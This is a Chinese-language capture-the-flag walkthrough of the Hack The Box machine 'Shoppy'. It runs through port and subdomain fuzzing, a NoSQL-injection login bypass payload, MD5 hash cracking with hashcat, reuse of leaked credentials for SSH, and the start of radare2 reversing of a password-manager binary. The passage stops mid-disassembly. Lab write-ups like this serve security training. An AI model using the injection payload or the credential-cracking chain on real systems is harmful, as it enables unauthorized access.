Hackthebox - Shoppy
靶场信息
靶场类型
信息收集
Nmap
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -sV -A -sC -p- --min-rate 5000 10.10.11.180
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 20:59 EST
Nmap scan report for 10.10.11.180
Host is up (0.25s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
| 256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_ 256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open copycat?
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Thu, 22 Dec 2022 01:59:42 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 2612
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 2612
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 4.218e-05
| go_gc_duration_seconds{quantile="0.25"} 0.000107572
| HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Thu, 22 Dec 2022 01:59:43 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 2612
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 2612
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 4.218e-05
|_ go_gc_duration_seconds{quantile="0.25"} 0.000107572
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9093-TCP:V=7.93%I=7%D=12/21%Time=63A3BA0E%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,2F0E,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:
SF:\x20text/plain;\x20version=0\.0\.4;\x20charset=utf-8\r\nDate:\x20Thu,\x
SF:2022\x20Dec\x202022\x2001:59:42\x20GMT\r\n\r\n#\x20HELP\x20go_gc_cycles
SF:_automatic_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycles\
SF:x20generated\x20by\x20the\x20Go\x20runtime\.\n#\x20TYPE\x20go_gc_cycles
SF:_automatic_gc_cycles_total\x20counter\ngo_gc_cycles_automatic_gc_cycles
SF:_total\x202612\n#\x20HELP\x20go_gc_cycles_forced_gc_cycles_total\x20Cou
SF:nt\x20of\x20completed\x20GC\x20cycles\x20forced\x20by\x20the\x20applica
SF:tion\.\n#\x20TYPE\x20go_gc_cycles_forced_gc_cycles_total\x20counter\ngo
SF:_gc_cycles_forced_gc_cycles_total\x200\n#\x20HELP\x20go_gc_cycles_total
SF:_gc_cycles_total\x20Count\x20of\x20all\x20completed\x20GC\x20cycles\.\n
SF:#\x20TYPE\x20go_gc_cycles_total_gc_cycles_total\x20counter\ngo_gc_cycle
SF:s_total_gc_cycles_total\x202612\n#\x20HELP\x20go_gc_duration_seconds\x2
SF:0A\x20summary\x20of\x20the\x20pause\x20duration\x20of\x20garbage\x20col
SF:lection\x20cycles\.\n#\x20TYPE\x20go_gc_duration_seconds\x20summary\ngo
SF:_gc_duration_seconds{quantile=\"0\"}\x204\.218e-05\ngo_gc_duration_seco
SF:nds{quantile=\"0\.25\"}\x200\.000107572\ngo_")%r(HTTPOptions,2A5A,"HTTP
SF:/1\.0\x20200\x20OK\r\nContent-Type:\x20text/plain;\x20version=0\.0\.4;\
SF:x20charset=utf-8\r\nDate:\x20Thu,\x2022\x20Dec\x202022\x2001:59:43\x20G
SF:MT\r\n\r\n#\x20HELP\x20go_gc_cycles_automatic_gc_cycles_total\x20Count\
SF:x20of\x20completed\x20GC\x20cycles\x20generated\x20by\x20the\x20Go\x20r
SF:untime\.\n#\x20TYPE\x20go_gc_cycles_automatic_gc_cycles_total\x20counte
SF:r\ngo_gc_cycles_automatic_gc_cycles_total\x202612\n#\x20HELP\x20go_gc_c
SF:ycles_forced_gc_cycles_total\x20Count\x20of\x20completed\x20GC\x20cycle
SF:s\x20forced\x20by\x20the\x20application\.\n#\x20TYPE\x20go_gc_cycles_fo
SF:rced_gc_cycles_total\x20counter\ngo_gc_cycles_forced_gc_cycles_total\x2
SF:00\n#\x20HELP\x20go_gc_cycles_total_gc_cycles_total\x20Count\x20of\x20a
SF:ll\x20completed\x20GC\x20cycles\.\n#\x20TYPE\x20go_gc_cycles_total_gc_c
SF:ycles_total\x20counter\ngo_gc_cycles_total_gc_cycles_total\x202612\n#\x
SF:20HELP\x20go_gc_duration_seconds\x20A\x20summary\x20of\x20the\x20pause\
SF:x20duration\x20of\x20garbage\x20collection\x20cycles\.\n#\x20TYPE\x20go
SF:_gc_duration_seconds\x20summary\ngo_gc_duration_seconds{quantile=\"0\"}
SF:\x204\.218e-05\ngo_gc_duration_seconds{quantile=\"0\.25\"}\x200\.000107
SF:572\ngo_");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/21%OT=22%CT=1%CU=41733%PV=Y%DS=2%DC=T%G=Y%TM=63A3BA
OS:84%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST
OS:11NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 276.37 ms 10.10.14.1
2 276.85 ms 10.10.11.180
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.68 seconds
这里一看就需要做 hosts 解析,我们加进去
echo 10.10.11.180 shoppy.htb >> /etc/hosts
Http
似乎是一个什么倒计时,倒计时到了就会推出一个什么版本,咱们做个信息收集先
Fuzz
┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u "http://shoppy.htb/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://shoppy.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
css [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 291ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 314ms]
images [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 315ms]
js [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 322ms]
login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 339ms]
assets [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 278ms]
Admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 295ms]
Login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 295ms]
fonts [Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 277ms]
ADMIN [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 277ms]
exports [Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 279ms]
[Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 279ms]
LOGIN [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 288ms]
:: Progress: [30000/30000] :: Job [1/1] :: 23 req/sec :: Duration: [0:03:43] :: Errors: 2 ::
经过测试,只有 Login 可以访问,是一个登陆页面
这里可以使用万能密码 admin’||’’===’ 进行登陆
登入后是一个价格表,右上角有个查询用户的功能
我们查询万能密码后,会得到两个账户
{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"}
{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}
漏洞利用
把 password 提取出来,丢 hashcat 跑一下
echo "6ebcea65320589ca4f2f1ce039975995" > hash
┌──(root㉿kali)-[~/Desktop]
└─# hashcat -m 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-12th Gen Intel(R) Core(TM) i5-12400F, 1438/2940 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
INFO: All hashes found as potfile and/or empty entries! Use --show to display them.
Started: Wed Dec 21 22:07:00 2022
Stopped: Wed Dec 21 22:07:00 2022
┌──(root㉿kali)-[~/Desktop]
└─# hashcat -m 0 hash /usr/share/wordlists/rockyou.txt --show
6ebcea65320589ca4f2f1ce039975995:remembermethisway
这边只有 josh 的账户爆出来了,admin 的无法爆出来
使用这个密码进行 ssh 登陆,是失败的,那就证明还有我们没有发现的地方,这里我们尝试爆破子域名
┌──(root㉿kali)-[~/Desktop]
└─# ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.11.180 -fs 169
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.11.180
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.shoppy.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 169
________________________________________________
mattermost [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 266ms]
:: Progress: [100000/100000] :: Job [1/1] :: 150 req/sec :: Duration: [0:11:17] :: Errors: 0 ::
加入到 hosts 解析中
echo 10.10.11.180 mattermost.shoppy.htb >> /etc/hosts
接着去访问一下
是一个登陆界面,用我们刚才破解出来的账号密码去进行登陆
username = josh
password = remembermethisway
登陆成功,到处看一下,做一下信息收集
在 Deploy Machine 中,我们看到 jaeger 发布了一个账号密码
username = jaeger
password = Sh0ppyBest@pp!
这似乎是一个用 docker 部署的东西,那应该可以使用 ssh 进行登陆
┌──(root㉿kali)-[~/Desktop]
└─# ssh jaeger@10.10.11.180
jaeger@10.10.11.180's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ whoami&&id
jaeger
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
登陆成功
jaeger@shoppy:~$ cat user.txt
ff6024ae7ef749b44ac3fbc6ce9df1ce
成功拿到 user 权限的 flag 文件
权限提升
User
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
这里发现一个奇怪的文件,我们想办法给他搞出来在本地分析一下
cd /home/deploy/
python3 -m http.server 1234
┌──(root㉿kali)-[~/Desktop]
└─# wget http://10.10.11.180:1234/password-manager
--2022-12-22 01:34:58-- http://10.10.11.180:1234/password-manager
正在连接 10.10.11.180:1234... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:18440 (18K) [application/octet-stream]
正在保存至: “password-manager”
password-manager 100%[=====================================================================================================================>] 18.01K 63.9KB/s 用时 0.3s
2022-12-22 01:34:59 (63.9 KB/s) - 已保存 “password-manager” [18440/18440])
┌──(root㉿kali)-[~/Desktop]
└─# file password-manager
password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped
这是一个 64 位的可执行文件
┌──(root㉿kali)-[~/Desktop]
└─# r2 password-manager
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[0x00001120]>
使用 r2 分析一下
┌──(root㉿kali)-[~/Desktop]
└─# r2 password-manager
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[0x00001120]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Finding and parsing C++ vtables (avrr)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information (aanr)
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00001120]> afl
0x00001120 1 43 entry0
0x00001150 4 41 -> 34 sym.deregister_tm_clones
0x00001180 4 57 -> 51 sym.register_tm_clones
0x000011c0 5 57 -> 50 sym.__do_global_dtors_aux
0x00001110 1 6 sym.imp.__cxa_finalize
0x00001200 1 5 entry.init0
0x000013eb 4 73 sym.__static_initialization_and_destruction_0_int__int_
0x000010e0 1 6 sym.imp.std::ios_base::Init::Init__
0x00001060 1 6 sym.imp.__cxa_atexit
0x00001434 1 21 sym._GLOBAL__sub_I_main
0x00001000 3 23 sym._init
0x00001205 5 486 -> 426 main
0x000014b4 1 9 sym._fini
0x00001450 4 93 sym.__libc_csu_init
0x000014b0 1 1 sym.__libc_csu_fini
0x00001030 1 6 sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::compare_std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char____const__const
0x00001040 1 6 fcn.00001040
0x00001050 1 6 sym.imp.system
0x00001070 1 6 sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
0x00001080 1 6 sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_
0x00001090 1 6 sym.imp.std::ostream::operator___std::ostream____std::ostream__
0x000010a0 1 6 fcn.000010a0
0x000010b0 1 6 sym.imp.std::basic_istream_char__std::char_traits_char____std::operator___char__std::char_traits_char___std::allocator_char____std::basic_istream_char__std::char_traits_char_____std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char____
0x000010c0 1 6 sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::basic_string_char_const__std::allocator_char__const_
0x000010d0 1 6 sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::basic_string__
0x000010f0 1 6 sym.imp._Unwind_Resume
0x00001100 1 6 sym.imp.std::allocator_char_::allocator__
使用函数 aaa
自动分析并命名函数,使用函数 afl
查看程序内的函数
这里找到了 main 函数,然后去到 main 函数的地址并查看汇编代码
[0x00001120]> s main
[0x00001205]> pdf
; DATA XREF from entry0 @ 0x113d
┌ 426: int main (int argc, char **argv, char **envp);
│ ; var int64_t var_60h @ rbp-0x60
│ ; var int64_t var_40h @ rbp-0x40
│ ; var int64_t var_11h @ rbp-0x11
│ ; var int64_t var_8h @ rbp-0x8
│ 0x00001205 55 push rbp
│ 0x00001206 4889e5 mov rbp, rsp
│ 0x00001209 53 push rbx
│ 0x0000120a 4883ec58 sub rsp, 0x58
│ 0x0000120e 488d35fb0d00. lea rsi, str.Welcome_to_Josh_password_manager_ ; 0x2010 ; "Welcome to Josh password manager!"
│ 0x00001215 488d3da42e00. lea rdi, obj.std::cout ; sym..bss
│ ; 0x40c0
│ 0x0000121c e85ffeffff call sym std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) ; sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_
│ 0x00001221 4889c2 mov rdx, rax
│ 0x00001224 488b05a52d00. mov rax, qword [method.std::basic_ostream_char__std::char_traits_char____std::endl_char__std.char_traits_char____std::basic_ostream_char__std::char_traits_char____] ; [0x3fd0:8]=0
│ 0x0000122b 4889c6 mov rsi, rax
│ 0x0000122e 4889d7 mov rdi, rdx
│ 0x00001231 e85afeffff call sym std::ostream::operator<<(std::ostream& (*)(std::ostream&)) ; sym.imp.std::ostream::operator___std::ostream____std::ostream__
│ 0x00001236 488d35fb0d00. lea rsi, str.Please_enter_your_master_password:_ ; 0x2038 ; "Please enter your master password: "
│ 0x0000123d 488d3d7c2e00. lea rdi, obj.std::cout ; sym..bss
│ ; 0x40c0
│ 0x00001244 e837feffff call sym std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) ; sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_
│ 0x00001249 488d45c0 lea rax, [var_40h]
│ 0x0000124d 4889c7 mov rdi, rax
│ 0x00001250 e87bfeffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::basic_string() ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::basic_string__
│ 0x00001255 488d45c0 lea rax, [var_40h]
│ 0x00001259 4889c6 mov rsi, rax
│ 0x0000125c 488d3d7d2f00. lea rdi, obj.std::cin ; 0x41e0
│ 0x00001263 e848feffff call sym std::basic_istream<char, std::char_traits<char> >& std::operator>><char, std::char_traits<char>, std::allocator<char> >(std::basic_istream<char, std::char_traits<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) ; sym.imp.std::basic_istream_char__std::char_traits_char____std::operator___char__std::char_traits_char___std::allocator_char____std::basic_istream_char__std::char_traits_char_____std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char____
│ 0x00001268 488d45ef lea rax, [var_11h]
│ 0x0000126c 4889c7 mov rdi, rax
│ 0x0000126f e88cfeffff call sym std::allocator<char>::allocator() ; sym.imp.std::allocator_char_::allocator__
│ 0x00001274 488d55ef lea rdx, [var_11h]
│ 0x00001278 488d45a0 lea rax, [var_60h]
│ 0x0000127c 488d35d90d00. lea rsi, [0x0000205c]
│ 0x00001283 4889c7 mov rdi, rax
│ 0x00001286 e835feffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::basic_string(char const*, std::allocator<char> const&) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::basic_string_char_const__std::allocator_char__const_
│ 0x0000128b 488d45ef lea rax, [var_11h]
│ 0x0000128f 4889c7 mov rdi, rax
│ 0x00001292 e809feffff call fcn.000010a0
│ 0x00001297 488d45a0 lea rax, [var_60h]
│ 0x0000129b 488d35bb0d00. lea rsi, str.Sample ; 0x205d ; u"Sample"
│ 0x000012a2 4889c7 mov rdi, rax
│ 0x000012a5 e8c6fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012aa 488d45a0 lea rax, [var_60h]
│ 0x000012ae 488d35aa0d00. lea rsi, [0x0000205f] ; u"ample"
│ 0x000012b5 4889c7 mov rdi, rax
│ 0x000012b8 e8b3fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012bd 488d45a0 lea rax, [var_60h]
│ 0x000012c1 488d35990d00. lea rsi, [0x00002061] ; u"mple"
│ 0x000012c8 4889c7 mov rdi, rax
│ 0x000012cb e8a0fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012d0 488d45a0 lea rax, [var_60h]
│ 0x000012d4 488d35880d00. lea rsi, [0x00002063] ; u"ple"
│ 0x000012db 4889c7 mov rdi, rax
│ 0x000012de e88dfdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012e3 488d45a0 lea rax, [var_60h]
│ 0x000012e7 488d35770d00. lea rsi, [0x00002065] ; u"le"
│ 0x000012ee 4889c7 mov rdi, rax
│ 0x000012f1 e87afdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012f6 488d45a0 lea rax, [var_60h]
│ 0x000012fa 488d35660d00. lea rsi, [0x00002067] ; "e"
│ 0x00001301 4889c7 mov rdi, rax
│ 0x00001304 e867fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x00001309 488d55a0 lea rdx, [var_60h]
│ 0x0000130d 488d45c0 lea rax, [var_40h]
│ 0x00001311 4889d6 mov rsi, rdx
│ 0x00001314 4889c7 mov rdi, rax
│ 0x00001317 e814fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::compare(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) const ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::compare_std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char____const__const
│ 0x0000131c 85c0 test eax, eax
│ 0x0000131e 0f94c0 sete al
│ 0x00001321 84c0 test al, al
│ ┌─< 0x00001323 743b je 0x1360
│ │ 0x00001325 488d35440d00. lea rsi, str.Access_granted__Here_is_creds__ ; 0x2070 ; "Access granted! Here is creds !"
│ │ 0x0000132c 488d3d8d2d00. lea rdi, obj.std::cout ; sym..bss
│ │ ; 0x40c0
│ │ 0x00001333 e848fdffff call sym std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) ; sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_
│ │ 0x00001338 4889c2 mov rdx, rax
│ │ 0x0000133b 488b058e2c00. mov rax, qword [method.std::basic_ostream_char__std::char_traits_char____std::endl_char__std.char_traits_char____std::basic_ostream_char__std::char_traits_char____] ; [0x3fd0:8]=0
│ │ 0x00001342 4889c6 mov rsi, rax
│ │ 0x00001345 4889d7 mov rdi, rdx
│ │ 0x00001348 e843fdffff call sym std::ostream::operator<<(std::ostream& (*)(std::ostream&)) ; sym.imp.std::ostream::operator___std::ostream____std::ostream__
│ │ 0x0000134d 488d3d3c0d00. lea rdi, str.cat__home_deploy_creds.txt ; 0x2090 ; "cat /home/deploy/creds.txt" ; const char *string
│ │ 0x00001354 e8f7fcffff call sym.imp.system ; int system(const char *string)
│ │ 0x00001359 bb00000000 mov ebx, 0
│ ┌──< 0x0000135e eb2d jmp 0x138d
│ ││ ; CODE XREF from main @ 0x1323
│ │└─> 0x00001360 488d35490d00. lea rsi, str.Access_denied__This_incident_will_be_reported__ ; 0x20b0 ; "Access denied! This incident will be reported !"
│ │ 0x00001367 488d3d522d00. lea rdi, obj.std::cout ; sym..bss
│ │ ; 0x40c0
│ │ 0x0000136e e80dfdffff call sym std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*) ; sym.imp.std::basic_ostream_char__std::char_traits_char____std::operator____std::char_traits_char____std::basic_ostream_char__std::char_traits_char_____char_const_
│ │ 0x00001373 4889c2 mov rdx, rax
│ │ 0x00001376 488b05532c00. mov rax, qword [method.std::basic_ostream_char__std::char_traits_char____std::endl_char__std.char_traits_char____std::basic_ostream_char__std::char_traits_char____] ; [0x3fd0:8]=0
│ │ 0x0000137d 4889c6 mov rsi, rax
│ │ 0x00001380 4889d7 mov rdi, rdx
│ │ 0x00001383 e808fdffff call sym std::ostream::operator<<(std::ostream& (*)(std::ostream&)) ; sym.imp.std::ostream::operator___std::ostream____std::ostream__
│ │ 0x00001388 bb01000000 mov ebx, 1
│ │ ; CODE XREF from main @ 0x135e
│ └──> 0x0000138d 488d45a0 lea rax, [var_60h]
│ 0x00001391 4889c7 mov rdi, rax
│ 0x00001394 e8a7fcffff call fcn.00001040
│ 0x00001399 488d45c0 lea rax, [var_40h]
│ 0x0000139d 4889c7 mov rdi, rax
│ 0x000013a0 e89bfcffff call fcn.00001040
│ 0x000013a5 89d8 mov eax, ebx
│ ┌─< 0x000013a7 eb3c jmp 0x13e5
..
│││ ; CODE XREFS from main @ +0x1b3, +0x1c4
│ │ ; CODE XREF from main @ 0x13a7
│ └─> 0x000013e5 488b5df8 mov rbx, qword [var_8h]
│ 0x000013e9 c9 leave
└ 0x000013ea c3 ret
使用函数 s main
定位到 main 函数的地址,使用函数 pdf
查看当前函数的汇编代码
0x0000120e 488d35fb0d00. lea rsi, str.Welcome_to_Josh_password_manager_ ; 0x2010 ; "Welcome to Josh password manager!"
这是一个 c++ 写的程序,运行程序之后会输出 “Welcome to Josh password manager!” 字符串
0x00001236 488d35fb0d00. lea rsi, str.Please_enter_your_master_password:_ ; 0x2038 ; "Please enter your master password: "
然后输出 “Please enter your master password: “ 字符串,并接受我们的输入
│ 0x0000129b 488d35bb0d00. lea rsi, str.Sample ; 0x205d ; u"Sample"
│ 0x000012a2 4889c7 mov rdi, rax
│ 0x000012a5 e8c6fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012aa 488d45a0 lea rax, [var_60h]
│ 0x000012ae 488d35aa0d00. lea rsi, [0x0000205f] ; u"ample"
│ 0x000012b5 4889c7 mov rdi, rax
│ 0x000012b8 e8b3fdffff call sym std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator+=(char const*) ; sym.imp.std::__cxx11::basic_string_char__std::char_traits_char___std::allocator_char___::operator_char_const_
│ 0x000012bd 488d45a0 lea rax, [var_60h]
│ 0x000012c1 488d35990d00. lea rsi, [0x00002061] ; u"mple"
│ 0x000012c8 4889c7 mov rdi, rax
